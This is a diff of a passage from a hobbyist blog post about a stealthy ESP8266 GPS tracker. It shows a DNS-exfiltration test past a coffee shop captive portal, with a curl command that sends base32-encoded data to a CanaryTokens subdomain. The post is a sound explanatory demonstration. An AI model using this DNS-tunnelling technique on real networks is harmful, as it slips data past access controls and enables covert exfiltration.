AlexLynd/alexlynd.com/content/en/blog/Stealthy-Drive-by-GPS-Tracker-ESP8266/index.md

 To try this service out, I connected to my local coffee shop Wi-Fi from my laptop without entering my info into the captive portal, and used my phone to generate a DNS token, which gave me a unique url in the format `<dns-token-here>.canarytokens.org`.

-In order to exfiltrate data to this token, [CanaryTokens specifices](https://docs.canarytokens.org/guide/dns-token.html) we prepend a random 2 digit number with `G`, and a base32 encoded subdomain - so I used an online converter to translate `meow123` to base 32: `NVSW65ZRGIZQ` and made a request to the following url with [cURL]():
+In order to exfiltrate data to this token, [CanaryTokens specifices](https://docs.canarytokens.org/guide/dns-token.html) we prepend a random 2 digit number with `G`, and a base32 encoded subdomain - so I used an online converter to translate `meow123` to base 32: `NVSW65ZRGIZQ` and made a request to the following url with [curl]():
 ```
 curl NVSW65ZRGIZQ.G69.<dns-token-here>.canarytokens.org
 ```